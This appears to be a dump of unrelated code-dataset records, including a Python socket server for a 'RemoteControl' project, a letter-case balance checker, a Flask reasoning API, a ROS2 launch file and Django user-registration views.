print(c[0].recv(10000).decode())
except socket.timeout:
pass
# c[1].send()
def accept(self):
while True:
a = Accept(self.s, self.clients, self.host)
a.accept()
self.clients = a.clients
def start(self):
self.s.bind((self.host, self.port))
self.s.listen(5)
accept = threading.Thread(target=self.accept)
accept.start()
conn_check = threading.Thread(target=self.connection_check)
conn_check.start()
# connection = threading.Thread(target=self.connection)
# connection.start()
if __name__ == "__main__":
server = MachineClient("localhost", 8080)
server.start()
|
normal
|
{
"blob_id": "ff1bb2634ffec6181a42c80a4b2a19c2c27a8f9f",
"index": 3136,
"step-1": "<mask token>\n\n\nclass MachineClient:\n\n def __init__(self, host, port):\n self.host = host\n self.port = port\n self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.db = DataBase(\n 'C:\\\\Users\\\\user\\\\Documents\\\\RemoteControl\\\\Server\\\\pythonsqlite.db'\n )\n self.data = ''\n self.clients = Clients()\n self.remote_client = []\n\n def connection_check(self):\n connection_check = ConnectionCheck(self.s, self.clients)\n if connection_check.check_database_update():\n return\n while True:\n time.sleep(2)\n connection_check.connect_db()\n self.clients = connection_check.start()\n <mask token>\n\n def accept(self):\n while True:\n a = Accept(self.s, self.clients, self.host)\n a.accept()\n self.clients = a.clients\n\n def start(self):\n self.s.bind((self.host, self.port))\n self.s.listen(5)\n accept = threading.Thread(target=self.accept)\n accept.start()\n conn_check = threading.Thread(target=self.connection_check)\n conn_check.start()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass MachineClient:\n\n def __init__(self, host, port):\n self.host = host\n self.port = port\n self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.db = DataBase(\n 'C:\\\\Users\\\\user\\\\Documents\\\\RemoteControl\\\\Server\\\\pythonsqlite.db'\n )\n self.data = ''\n self.clients = Clients()\n self.remote_client = []\n\n def connection_check(self):\n connection_check = ConnectionCheck(self.s, self.clients)\n if connection_check.check_database_update():\n return\n while True:\n time.sleep(2)\n connection_check.connect_db()\n self.clients = connection_check.start()\n\n def connection(self):\n while True:\n for c in self.clients.data:\n if c[1] is not None:\n print('connection')\n self.s.settimeout(0.5)\n try:\n print(c[0].recv(10000).decode())\n except socket.timeout:\n pass\n\n def accept(self):\n while True:\n a = Accept(self.s, self.clients, self.host)\n a.accept()\n self.clients = a.clients\n\n def start(self):\n self.s.bind((self.host, self.port))\n self.s.listen(5)\n accept = threading.Thread(target=self.accept)\n accept.start()\n conn_check = threading.Thread(target=self.connection_check)\n conn_check.start()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass MachineClient:\n\n def __init__(self, host, port):\n self.host = host\n self.port = port\n self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.db = DataBase(\n 'C:\\\\Users\\\\user\\\\Documents\\\\RemoteControl\\\\Server\\\\pythonsqlite.db'\n )\n self.data = ''\n self.clients = Clients()\n self.remote_client = []\n\n def connection_check(self):\n connection_check = ConnectionCheck(self.s, self.clients)\n if connection_check.check_database_update():\n return\n while True:\n time.sleep(2)\n connection_check.connect_db()\n self.clients = connection_check.start()\n\n def connection(self):\n while True:\n for c in self.clients.data:\n if c[1] is not None:\n print('connection')\n self.s.settimeout(0.5)\n try:\n print(c[0].recv(10000).decode())\n except socket.timeout:\n pass\n\n def accept(self):\n while True:\n a = Accept(self.s, self.clients, self.host)\n a.accept()\n self.clients = a.clients\n\n def start(self):\n self.s.bind((self.host, self.port))\n self.s.listen(5)\n accept = threading.Thread(target=self.accept)\n accept.start()\n conn_check = threading.Thread(target=self.connection_check)\n conn_check.start()\n\n\nif __name__ == '__main__':\n server = MachineClient('localhost', 8080)\n server.start()\n",
"step-4": "import socket\nfrom Server.MachineClient.Identification import Identification\nfrom Server.SQL import DataBase\nimport threading\nimport time\nfrom Server.Connection.AcceptClients import Accept\nfrom Server.Connection.ConnectionCheck import ConnectionCheck\nfrom Server.Clients_Data import Clients\n\n\nclass MachineClient:\n\n def __init__(self, host, port):\n self.host = host\n self.port = port\n self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.db = DataBase(\n 'C:\\\\Users\\\\user\\\\Documents\\\\RemoteControl\\\\Server\\\\pythonsqlite.db'\n )\n self.data = ''\n self.clients = Clients()\n self.remote_client = []\n\n def connection_check(self):\n connection_check = ConnectionCheck(self.s, self.clients)\n if connection_check.check_database_update():\n return\n while True:\n time.sleep(2)\n connection_check.connect_db()\n self.clients = connection_check.start()\n\n def connection(self):\n while True:\n for c in self.clients.data:\n if c[1] is not None:\n print('connection')\n self.s.settimeout(0.5)\n try:\n print(c[0].recv(10000).decode())\n except socket.timeout:\n pass\n\n def accept(self):\n while True:\n a = Accept(self.s, self.clients, self.host)\n a.accept()\n self.clients = a.clients\n\n def start(self):\n self.s.bind((self.host, self.port))\n self.s.listen(5)\n accept = threading.Thread(target=self.accept)\n accept.start()\n conn_check = threading.Thread(target=self.connection_check)\n conn_check.start()\n\n\nif __name__ == '__main__':\n server = MachineClient('localhost', 8080)\n server.start()\n",
"step-5": "import socket\nfrom Server.MachineClient.Identification import Identification\nfrom Server.SQL import DataBase\nimport threading\nimport time\nfrom Server.Connection.AcceptClients import Accept\nfrom Server.Connection.ConnectionCheck import ConnectionCheck\nfrom Server.Clients_Data import Clients\n\n\nclass MachineClient:\n def __init__(self, host, port):\n self.host = host\n self.port = port\n self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.db = DataBase(r\"C:\\Users\\user\\Documents\\RemoteControl\\Server\\pythonsqlite.db\")\n self.data = \"\"\n self.clients = Clients()\n self.remote_client = []\n\n def connection_check(self):\n connection_check = ConnectionCheck(self.s, self.clients)\n if connection_check.check_database_update():\n return\n while True:\n time.sleep(2)\n connection_check.connect_db()\n self.clients = connection_check.start()\n\n def connection(self):\n while True:\n for c in self.clients.data:\n if c[1] is not None:\n print(\"connection\")\n self.s.settimeout(0.5)\n try:\n print(c[0].recv(10000).decode())\n except socket.timeout:\n pass\n # c[1].send()\n\n def accept(self):\n while True:\n a = Accept(self.s, self.clients, self.host)\n a.accept()\n self.clients = a.clients\n\n def start(self):\n self.s.bind((self.host, self.port))\n self.s.listen(5)\n\n accept = threading.Thread(target=self.accept)\n accept.start()\n\n conn_check = threading.Thread(target=self.connection_check)\n conn_check.start()\n\n # connection = threading.Thread(target=self.connection)\n # connection.start()\n\n\nif __name__ == \"__main__\":\n server = MachineClient(\"localhost\", 8080)\n server.start()\n",
"step-ids": [
5,
6,
7,
8,
9
]
}
|
[
5,
6,
7,
8,
9
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
for line in sys.stdin:
lower = 0
upper = 0
for x in range(0, len(line)):
if 'a' <= line[x] <= 'z':
lower = lower + 1
elif 'A' <= line[x] <= 'Z':
upper = upper + 1
if lower == upper:
print('true')
else:
print('false')
<|reserved_special_token_1|>
import sys
<|reserved_special_token_0|>
for line in sys.stdin:
lower = 0
upper = 0
for x in range(0, len(line)):
if 'a' <= line[x] <= 'z':
lower = lower + 1
elif 'A' <= line[x] <= 'Z':
upper = upper + 1
if lower == upper:
print('true')
else:
print('false')
<|reserved_special_token_1|>
import sys
'''
Given a string, does the string contain an equal number of uppercase and
lowercase letters? Ignore whitespace, numbers, and punctuation. Return the
string “true” if balanced or the string “false” if not balanced.
'''
for line in sys.stdin:
lower = 0
upper = 0
# Count number of lowercase and uppercase letters
for x in range(0, len(line)):
if 'a' <= line[x] <= 'z':
lower = lower + 1
elif 'A' <= line[x] <= 'Z':
upper = upper + 1
# Determine if balanced or not
if lower == upper:
print('true')
else:
print('false')
# Repeat for each input line
|
flexible
|
{
"blob_id": "4b3664153940b064b424bd77de473a6409437f88",
"index": 3279,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor line in sys.stdin:\n lower = 0\n upper = 0\n for x in range(0, len(line)):\n if 'a' <= line[x] <= 'z':\n lower = lower + 1\n elif 'A' <= line[x] <= 'Z':\n upper = upper + 1\n if lower == upper:\n print('true')\n else:\n print('false')\n",
"step-3": "import sys\n<mask token>\nfor line in sys.stdin:\n lower = 0\n upper = 0\n for x in range(0, len(line)):\n if 'a' <= line[x] <= 'z':\n lower = lower + 1\n elif 'A' <= line[x] <= 'Z':\n upper = upper + 1\n if lower == upper:\n print('true')\n else:\n print('false')\n",
"step-4": "import sys\n\n'''\nGiven a string, does the string contain an equal number of uppercase and \nlowercase letters? Ignore whitespace, numbers, and punctuation. Return the \nstring “true” if balanced or the string “false” if not balanced.\n'''\nfor line in sys.stdin:\n lower = 0\n upper = 0\n\n # Count number of lowercase and uppercase letters\n for x in range(0, len(line)):\n if 'a' <= line[x] <= 'z':\n lower = lower + 1\n elif 'A' <= line[x] <= 'Z':\n upper = upper + 1\n\n # Determine if balanced or not\n if lower == upper:\n print('true')\n else:\n print('false')\n\n # Repeat for each input line\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from flask import Flask, jsonify, make_response, request
app = Flask(__name__)
VERSION = (0, 1, 0)
VERSION_STRING = "{}.{}.{}".format(*VERSION)
LANG_ID = "lang.natural.english"
@app.errorhandler(404)
def not_found(error):
    """Return the 404 error as a JSON payload instead of Flask's HTML page."""
    payload = jsonify({'error': 'Not found'})
    return make_response(payload, 404)
@app.route("/")
def entry():
return jsonify([{
"id": "com.natlang",
"name": "NatLang",
"website": "https://aaron.stockdill.nz/",
"version": VERSION_STRING,
"description": "A placeholder natural language reasoner.",
"icon": "",
"base": "http://aarons-macbook.local:5003/api/{}".format(VERSION_STRING),
"provides": {
"reason": "/reason",
"translate": "/translate"
}
}])
@app.route("/api/{}/reason".format(VERSION_STRING))
def reason_base():
return jsonify({
"result": "success",
"reasoning": [[LANG_ID, "manual", "reasonEnglish", "Manually reason with natural language."]]
})
def common_transform(json_data, key):
    """Build the transformed goal/formula from a request payload.

    Shallow-copies the object stored under *key* in *json_data*, replaces
    its "data" field with the payload's "extraInfo" value, and tags the
    copy with this service's language ID.  The original object in
    *json_data* is left untouched (top-level keys only — it is a shallow
    copy).

    :param json_data: parsed JSON body of the request
    :param key: which entry to transform ("goal" or "formula")
    :return: the transformed copy
    """
    old_goal = json_data.get(key)
    new_goal = old_goal.copy()
    new_goal["data"] = json_data.get("extraInfo")
    new_goal["language"] = LANG_ID
    # Removed the leftover debug print(new_goal): it wrote every request's
    # payload to stdout on each call.
    return new_goal
@app.route("/api/{}/reason/apply".format(VERSION_STRING), methods=["GET", "POST"])
def reason_apply():
rule_id = request.args.get("id")
if rule_id == "reasonEnglish":
json_data = request.get_json()
new_goal = common_transform(json_data, "goal")
return jsonify({
"result": "success",
"newGoals": [new_goal] if new_goal["data"] else []
})
else:
return jsonify({
"result": "failure",
"reason": "Unknown rule ID."
})
@app.route("/api/{}/translate".format(VERSION_STRING))
def translate_base():
other_languages = ["lang.speedith", "lang.isabelle"]
def all_pairs(xs, ys):
for x in xs:
for y in ys:
yield (x, y)
yield (y, x)
return jsonify({
"result": "success",
"translations": [(from_lang, to_lang, "manual")
for (from_lang, to_lang) in all_pairs(other_languages, [LANG_ID])]
})
@app.route("/api/{}/translate/translate".format(VERSION_STRING), methods=["GET", "POST"])
def translate_apply():
from_language = request.args.get("from")
to_language = request.args.get("to")
print(LANG_ID in {from_language, to_language}, LANG_ID, from_language, to_language)
if LANG_ID in {from_language, to_language}:
json_data = request.get_json()
new_goal = common_transform(json_data, "formula")
return jsonify({
"result": "success",
"formula": new_goal
})
else:
return jsonify({
"result": "failure",
"reason": "Unable to translate when one of the languages is not {}".format(LANG_ID)
})
if __name__ == "__main__":
app.run()
|
normal
|
{
"blob_id": "49e1dc98ecc2e5c12c6e520721a6c0a7c2665cca",
"index": 3450,
"step-1": "<mask token>\n\n\n@app.errorhandler(404)\ndef not_found(error):\n return make_response(jsonify({'error': 'Not found'}), 404)\n\n\n<mask token>\n\n\n@app.route('/api/{}/reason/apply'.format(VERSION_STRING), methods=['GET',\n 'POST'])\ndef reason_apply():\n rule_id = request.args.get('id')\n if rule_id == 'reasonEnglish':\n json_data = request.get_json()\n new_goal = common_transform(json_data, 'goal')\n return jsonify({'result': 'success', 'newGoals': [new_goal] if\n new_goal['data'] else []})\n else:\n return jsonify({'result': 'failure', 'reason': 'Unknown rule ID.'})\n\n\n@app.route('/api/{}/translate'.format(VERSION_STRING))\ndef translate_base():\n other_languages = ['lang.speedith', 'lang.isabelle']\n\n def all_pairs(xs, ys):\n for x in xs:\n for y in ys:\n yield x, y\n yield y, x\n return jsonify({'result': 'success', 'translations': [(from_lang,\n to_lang, 'manual') for from_lang, to_lang in all_pairs(\n other_languages, [LANG_ID])]})\n\n\n@app.route('/api/{}/translate/translate'.format(VERSION_STRING), methods=[\n 'GET', 'POST'])\ndef translate_apply():\n from_language = request.args.get('from')\n to_language = request.args.get('to')\n print(LANG_ID in {from_language, to_language}, LANG_ID, from_language,\n to_language)\n if LANG_ID in {from_language, to_language}:\n json_data = request.get_json()\n new_goal = common_transform(json_data, 'formula')\n return jsonify({'result': 'success', 'formula': new_goal})\n else:\n return jsonify({'result': 'failure', 'reason':\n 'Unable to translate when one of the languages is not {}'.\n format(LANG_ID)})\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\n@app.errorhandler(404)\ndef not_found(error):\n return make_response(jsonify({'error': 'Not found'}), 404)\n\n\n@app.route('/')\ndef entry():\n return jsonify([{'id': 'com.natlang', 'name': 'NatLang', 'website':\n 'https://aaron.stockdill.nz/', 'version': VERSION_STRING,\n 'description': 'A placeholder natural language reasoner.', 'icon':\n '', 'base': 'http://aarons-macbook.local:5003/api/{}'.format(\n VERSION_STRING), 'provides': {'reason': '/reason', 'translate':\n '/translate'}}])\n\n\n<mask token>\n\n\n@app.route('/api/{}/reason/apply'.format(VERSION_STRING), methods=['GET',\n 'POST'])\ndef reason_apply():\n rule_id = request.args.get('id')\n if rule_id == 'reasonEnglish':\n json_data = request.get_json()\n new_goal = common_transform(json_data, 'goal')\n return jsonify({'result': 'success', 'newGoals': [new_goal] if\n new_goal['data'] else []})\n else:\n return jsonify({'result': 'failure', 'reason': 'Unknown rule ID.'})\n\n\n@app.route('/api/{}/translate'.format(VERSION_STRING))\ndef translate_base():\n other_languages = ['lang.speedith', 'lang.isabelle']\n\n def all_pairs(xs, ys):\n for x in xs:\n for y in ys:\n yield x, y\n yield y, x\n return jsonify({'result': 'success', 'translations': [(from_lang,\n to_lang, 'manual') for from_lang, to_lang in all_pairs(\n other_languages, [LANG_ID])]})\n\n\n@app.route('/api/{}/translate/translate'.format(VERSION_STRING), methods=[\n 'GET', 'POST'])\ndef translate_apply():\n from_language = request.args.get('from')\n to_language = request.args.get('to')\n print(LANG_ID in {from_language, to_language}, LANG_ID, from_language,\n to_language)\n if LANG_ID in {from_language, to_language}:\n json_data = request.get_json()\n new_goal = common_transform(json_data, 'formula')\n return jsonify({'result': 'success', 'formula': new_goal})\n else:\n return jsonify({'result': 'failure', 'reason':\n 'Unable to translate when one of the languages is not {}'.\n format(LANG_ID)})\n\n\n<mask token>\n",
"step-3": "<mask token>\napp = Flask(__name__)\nVERSION = 0, 1, 0\nVERSION_STRING = '{}.{}.{}'.format(*VERSION)\nLANG_ID = 'lang.natural.english'\n\n\n@app.errorhandler(404)\ndef not_found(error):\n return make_response(jsonify({'error': 'Not found'}), 404)\n\n\n@app.route('/')\ndef entry():\n return jsonify([{'id': 'com.natlang', 'name': 'NatLang', 'website':\n 'https://aaron.stockdill.nz/', 'version': VERSION_STRING,\n 'description': 'A placeholder natural language reasoner.', 'icon':\n '', 'base': 'http://aarons-macbook.local:5003/api/{}'.format(\n VERSION_STRING), 'provides': {'reason': '/reason', 'translate':\n '/translate'}}])\n\n\n@app.route('/api/{}/reason'.format(VERSION_STRING))\ndef reason_base():\n return jsonify({'result': 'success', 'reasoning': [[LANG_ID, 'manual',\n 'reasonEnglish', 'Manually reason with natural language.']]})\n\n\ndef common_transform(json_data, key):\n old_goal = json_data.get(key)\n new_goal_data = json_data.get('extraInfo')\n new_goal = old_goal.copy()\n new_goal['data'] = new_goal_data\n new_goal['language'] = LANG_ID\n print(new_goal)\n return new_goal\n\n\n@app.route('/api/{}/reason/apply'.format(VERSION_STRING), methods=['GET',\n 'POST'])\ndef reason_apply():\n rule_id = request.args.get('id')\n if rule_id == 'reasonEnglish':\n json_data = request.get_json()\n new_goal = common_transform(json_data, 'goal')\n return jsonify({'result': 'success', 'newGoals': [new_goal] if\n new_goal['data'] else []})\n else:\n return jsonify({'result': 'failure', 'reason': 'Unknown rule ID.'})\n\n\n@app.route('/api/{}/translate'.format(VERSION_STRING))\ndef translate_base():\n other_languages = ['lang.speedith', 'lang.isabelle']\n\n def all_pairs(xs, ys):\n for x in xs:\n for y in ys:\n yield x, y\n yield y, x\n return jsonify({'result': 'success', 'translations': [(from_lang,\n to_lang, 'manual') for from_lang, to_lang in all_pairs(\n other_languages, [LANG_ID])]})\n\n\n@app.route('/api/{}/translate/translate'.format(VERSION_STRING), 
methods=[\n 'GET', 'POST'])\ndef translate_apply():\n from_language = request.args.get('from')\n to_language = request.args.get('to')\n print(LANG_ID in {from_language, to_language}, LANG_ID, from_language,\n to_language)\n if LANG_ID in {from_language, to_language}:\n json_data = request.get_json()\n new_goal = common_transform(json_data, 'formula')\n return jsonify({'result': 'success', 'formula': new_goal})\n else:\n return jsonify({'result': 'failure', 'reason':\n 'Unable to translate when one of the languages is not {}'.\n format(LANG_ID)})\n\n\nif __name__ == '__main__':\n app.run()\n",
"step-4": "from flask import Flask, jsonify, make_response, request\napp = Flask(__name__)\nVERSION = 0, 1, 0\nVERSION_STRING = '{}.{}.{}'.format(*VERSION)\nLANG_ID = 'lang.natural.english'\n\n\n@app.errorhandler(404)\ndef not_found(error):\n return make_response(jsonify({'error': 'Not found'}), 404)\n\n\n@app.route('/')\ndef entry():\n return jsonify([{'id': 'com.natlang', 'name': 'NatLang', 'website':\n 'https://aaron.stockdill.nz/', 'version': VERSION_STRING,\n 'description': 'A placeholder natural language reasoner.', 'icon':\n '', 'base': 'http://aarons-macbook.local:5003/api/{}'.format(\n VERSION_STRING), 'provides': {'reason': '/reason', 'translate':\n '/translate'}}])\n\n\n@app.route('/api/{}/reason'.format(VERSION_STRING))\ndef reason_base():\n return jsonify({'result': 'success', 'reasoning': [[LANG_ID, 'manual',\n 'reasonEnglish', 'Manually reason with natural language.']]})\n\n\ndef common_transform(json_data, key):\n old_goal = json_data.get(key)\n new_goal_data = json_data.get('extraInfo')\n new_goal = old_goal.copy()\n new_goal['data'] = new_goal_data\n new_goal['language'] = LANG_ID\n print(new_goal)\n return new_goal\n\n\n@app.route('/api/{}/reason/apply'.format(VERSION_STRING), methods=['GET',\n 'POST'])\ndef reason_apply():\n rule_id = request.args.get('id')\n if rule_id == 'reasonEnglish':\n json_data = request.get_json()\n new_goal = common_transform(json_data, 'goal')\n return jsonify({'result': 'success', 'newGoals': [new_goal] if\n new_goal['data'] else []})\n else:\n return jsonify({'result': 'failure', 'reason': 'Unknown rule ID.'})\n\n\n@app.route('/api/{}/translate'.format(VERSION_STRING))\ndef translate_base():\n other_languages = ['lang.speedith', 'lang.isabelle']\n\n def all_pairs(xs, ys):\n for x in xs:\n for y in ys:\n yield x, y\n yield y, x\n return jsonify({'result': 'success', 'translations': [(from_lang,\n to_lang, 'manual') for from_lang, to_lang in all_pairs(\n other_languages, 
[LANG_ID])]})\n\n\n@app.route('/api/{}/translate/translate'.format(VERSION_STRING), methods=[\n 'GET', 'POST'])\ndef translate_apply():\n from_language = request.args.get('from')\n to_language = request.args.get('to')\n print(LANG_ID in {from_language, to_language}, LANG_ID, from_language,\n to_language)\n if LANG_ID in {from_language, to_language}:\n json_data = request.get_json()\n new_goal = common_transform(json_data, 'formula')\n return jsonify({'result': 'success', 'formula': new_goal})\n else:\n return jsonify({'result': 'failure', 'reason':\n 'Unable to translate when one of the languages is not {}'.\n format(LANG_ID)})\n\n\nif __name__ == '__main__':\n app.run()\n",
"step-5": "from flask import Flask, jsonify, make_response, request\n\n\napp = Flask(__name__)\n\nVERSION = (0, 1, 0)\nVERSION_STRING = \"{}.{}.{}\".format(*VERSION)\n\nLANG_ID = \"lang.natural.english\"\n\n\n@app.errorhandler(404)\ndef not_found(error):\n return make_response(jsonify({'error': 'Not found'}), 404)\n\n\n@app.route(\"/\")\ndef entry():\n return jsonify([{\n \"id\": \"com.natlang\",\n \"name\": \"NatLang\",\n \"website\": \"https://aaron.stockdill.nz/\",\n \"version\": VERSION_STRING,\n \"description\": \"A placeholder natural language reasoner.\",\n \"icon\": \"\",\n \"base\": \"http://aarons-macbook.local:5003/api/{}\".format(VERSION_STRING),\n \"provides\": {\n \"reason\": \"/reason\",\n \"translate\": \"/translate\"\n }\n }])\n\n\n@app.route(\"/api/{}/reason\".format(VERSION_STRING))\ndef reason_base():\n return jsonify({\n \"result\": \"success\",\n \"reasoning\": [[LANG_ID, \"manual\", \"reasonEnglish\", \"Manually reason with natural language.\"]]\n })\n\n\ndef common_transform(json_data, key):\n old_goal = json_data.get(key)\n new_goal_data = json_data.get(\"extraInfo\")\n new_goal = old_goal.copy()\n new_goal[\"data\"] = new_goal_data\n new_goal[\"language\"] = LANG_ID\n print(new_goal)\n return new_goal\n\n\n@app.route(\"/api/{}/reason/apply\".format(VERSION_STRING), methods=[\"GET\", \"POST\"])\ndef reason_apply():\n rule_id = request.args.get(\"id\")\n if rule_id == \"reasonEnglish\":\n json_data = request.get_json()\n new_goal = common_transform(json_data, \"goal\")\n return jsonify({\n \"result\": \"success\",\n \"newGoals\": [new_goal] if new_goal[\"data\"] else []\n })\n else:\n return jsonify({\n \"result\": \"failure\",\n \"reason\": \"Unknown rule ID.\"\n })\n\n\n@app.route(\"/api/{}/translate\".format(VERSION_STRING))\ndef translate_base():\n other_languages = [\"lang.speedith\", \"lang.isabelle\"]\n def all_pairs(xs, ys):\n for x in xs:\n for y in ys:\n yield (x, y)\n yield (y, x)\n return jsonify({\n \"result\": \"success\",\n 
\"translations\": [(from_lang, to_lang, \"manual\")\n for (from_lang, to_lang) in all_pairs(other_languages, [LANG_ID])]\n })\n\n\n@app.route(\"/api/{}/translate/translate\".format(VERSION_STRING), methods=[\"GET\", \"POST\"])\ndef translate_apply():\n from_language = request.args.get(\"from\")\n to_language = request.args.get(\"to\")\n print(LANG_ID in {from_language, to_language}, LANG_ID, from_language, to_language)\n if LANG_ID in {from_language, to_language}:\n json_data = request.get_json()\n new_goal = common_transform(json_data, \"formula\")\n return jsonify({\n \"result\": \"success\",\n \"formula\": new_goal\n })\n else:\n return jsonify({\n \"result\": \"failure\",\n \"reason\": \"Unable to translate when one of the languages is not {}\".format(LANG_ID)\n })\n\nif __name__ == \"__main__\":\n app.run()\n",
"step-ids": [
4,
5,
9,
10,
11
]
}
|
[
4,
5,
9,
10,
11
] |
import os
from pathlib import Path
import shutil
from ament_index_python.packages import get_package_share_directory, get_package_prefix
import launch
import launch_ros.actions
def generate_launch_description():
    """Launch description that spawns the cart SDF model into Gazebo."""
    sdf_path = os.path.join(get_package_share_directory('crs_support'),
        'sdf', 'cart.sdf')
    # spawn_entity.py inserts the named model at the given pose.
    spawn_args = ['-entity', 'cart', '-x', '0', '-y', '0.2', '-z', '0.05',
        '-file', sdf_path]
    spawner = launch_ros.actions.Node(node_name='spawn_node',
        package='gazebo_ros', node_executable='spawn_entity.py',
        arguments=spawn_args)
    return launch.LaunchDescription([spawner])
|
normal
|
{
"blob_id": "cc74163d5dbcc2b2ca0fe5222692f6f5e45f73fe",
"index": 2377,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef generate_launch_description():\n cart_sdf = os.path.join(get_package_share_directory('crs_support'),\n 'sdf', 'cart.sdf')\n cart_spawner = launch_ros.actions.Node(node_name='spawn_node', package=\n 'gazebo_ros', node_executable='spawn_entity.py', arguments=[\n '-entity', 'cart', '-x', '0', '-y', '0.2', '-z', '0.05', '-file',\n cart_sdf])\n return launch.LaunchDescription([cart_spawner])\n",
"step-3": "import os\nfrom pathlib import Path\nimport shutil\nfrom ament_index_python.packages import get_package_share_directory, get_package_prefix\nimport launch\nimport launch_ros.actions\n\n\ndef generate_launch_description():\n cart_sdf = os.path.join(get_package_share_directory('crs_support'),\n 'sdf', 'cart.sdf')\n cart_spawner = launch_ros.actions.Node(node_name='spawn_node', package=\n 'gazebo_ros', node_executable='spawn_entity.py', arguments=[\n '-entity', 'cart', '-x', '0', '-y', '0.2', '-z', '0.05', '-file',\n cart_sdf])\n return launch.LaunchDescription([cart_spawner])\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
@login_required
def get_verification_code(request):
"""Maybe ajaxify this in the future
"""
if request.user.get_profile().is_verified:
messages.info(request, 'Olet jo vahvistanut osoitteesi')
else:
verification_code = request.user.get_profile().gen_verification_code()
extractx = {'code': verification_code}
subject = _('Verification code')
email_helpers.send_user_email(request.user, subject,
'send_verification_code.txt', extractx)
messages.info(request, 'Vahvistuskoodi on lähetetty sähköpostiisi')
return HttpResponseRedirect(reverse('user', args=(request.user.username,)))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def register(request):
"""Registration view, Django offers none
"""
data = request.POST.copy() or None
user_creation_form = auth_forms.UserCreationForm(data)
if user_creation_form.is_bound:
if user_creation_form.is_valid():
user = user_creation_form.save()
user = authenticate(username=user.username, password=
user_creation_form.cleaned_data['password1'])
login(request, user)
return HttpResponseRedirect(reverse('user', args=(user.username,)))
context = {'user_creation_form': user_creation_form}
req_ctx = RequestContext(request, context)
return render_to_response('register.html', req_ctx)
@login_required
def get_verification_code(request):
"""Maybe ajaxify this in the future
"""
if request.user.get_profile().is_verified:
messages.info(request, 'Olet jo vahvistanut osoitteesi')
else:
verification_code = request.user.get_profile().gen_verification_code()
extractx = {'code': verification_code}
subject = _('Verification code')
email_helpers.send_user_email(request.user, subject,
'send_verification_code.txt', extractx)
messages.info(request, 'Vahvistuskoodi on lähetetty sähköpostiisi')
return HttpResponseRedirect(reverse('user', args=(request.user.username,)))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def user_view(request, username):
"""View the user
"""
import datetime
user = get_object_or_404(auth_models.User, username=username, is_active
=True)
now = datetime.datetime.now()
post_count = blog_models.Post.objects.filter(author=user,
publish_at__lte=now).count()
email_verification_form = None
if request.user.id == user.id and not user.get_profile().is_verified:
data = request.POST.copy() or None
email_verification_form = users_forms.EmailVerificationForm(data=data)
if email_verification_form.is_bound:
email_verification_form.data['user'] = request.user
if email_verification_form.is_valid():
email_verification_form.save()
messages.info(request, 'Tunnuksesi on aktivoitu!')
return HttpResponseRedirect(reverse('user', args=(request.
user.username,)))
context = {'viewed_user': user, 'post_count': post_count,
'email_verification_form': email_verification_form}
req_ctx = RequestContext(request, context)
return render_to_response('user.html', req_ctx)
def register(request):
"""Registration view, Django offers none
"""
data = request.POST.copy() or None
user_creation_form = auth_forms.UserCreationForm(data)
if user_creation_form.is_bound:
if user_creation_form.is_valid():
user = user_creation_form.save()
user = authenticate(username=user.username, password=
user_creation_form.cleaned_data['password1'])
login(request, user)
return HttpResponseRedirect(reverse('user', args=(user.username,)))
context = {'user_creation_form': user_creation_form}
req_ctx = RequestContext(request, context)
return render_to_response('register.html', req_ctx)
@login_required
def get_verification_code(request):
"""Maybe ajaxify this in the future
"""
if request.user.get_profile().is_verified:
messages.info(request, 'Olet jo vahvistanut osoitteesi')
else:
verification_code = request.user.get_profile().gen_verification_code()
extractx = {'code': verification_code}
subject = _('Verification code')
email_helpers.send_user_email(request.user, subject,
'send_verification_code.txt', extractx)
messages.info(request, 'Vahvistuskoodi on lähetetty sähköpostiisi')
return HttpResponseRedirect(reverse('user', args=(request.user.username,)))
<|reserved_special_token_1|>
from django.contrib.auth.decorators import login_required
from django.contrib.auth import models as auth_models
from django.contrib.auth import forms as auth_forms
from django.contrib.auth import authenticate, login
from django.core.urlresolvers import reverse
from django.utils.translation import ugettext_noop as _
from django.contrib import messages
from django.http import HttpResponseRedirect
from django.shortcuts import get_object_or_404, render_to_response
from django.template import RequestContext
from django_mises.blog import models as blog_models
from django_mises.users import forms as users_forms
from django_mises import email_helpers
def user_view(request, username):
    """Render the public profile page for *username*.

    Active accounts only.  When the viewer is the (still unverified)
    owner of the profile, an e-mail verification form is shown and
    processed here as well.
    """
    import datetime
    viewed = get_object_or_404(auth_models.User, username=username,
        is_active=True)
    now = datetime.datetime.now()
    post_total = blog_models.Post.objects.filter(author=viewed,
        publish_at__lte=now).count()
    verification_form = None
    if request.user.id == viewed.id and not viewed.get_profile().is_verified:
        submitted = request.POST.copy() or None
        verification_form = users_forms.EmailVerificationForm(data=submitted)
        if verification_form.is_bound:
            # The form validates the submitted code against this user.
            verification_form.data['user'] = request.user
            if verification_form.is_valid():
                verification_form.save()
                messages.info(request, 'Tunnuksesi on aktivoitu!')
                return HttpResponseRedirect(reverse('user',
                    args=(request.user.username,)))
    req_ctx = RequestContext(request, {
        'viewed_user': viewed,
        'post_count': post_total,
        'email_verification_form': verification_form,
    })
    return render_to_response('user.html', req_ctx)
def register(request):
    """Sign-up view (Django ships none): create the account, log the new
    user in, and redirect to their profile page.
    """
    submitted = request.POST.copy() or None
    form = auth_forms.UserCreationForm(submitted)
    if form.is_bound and form.is_valid():
        new_user = form.save()
        # authenticate() must precede login() so the session can be started.
        new_user = authenticate(username=new_user.username,
            password=form.cleaned_data['password1'])
        login(request, new_user)
        return HttpResponseRedirect(reverse('user', args=(new_user.username,)))
    req_ctx = RequestContext(request, {'user_creation_form': form})
    return render_to_response('register.html', req_ctx)
@login_required
def get_verification_code(request):
    """Maybe ajaxify this in the future

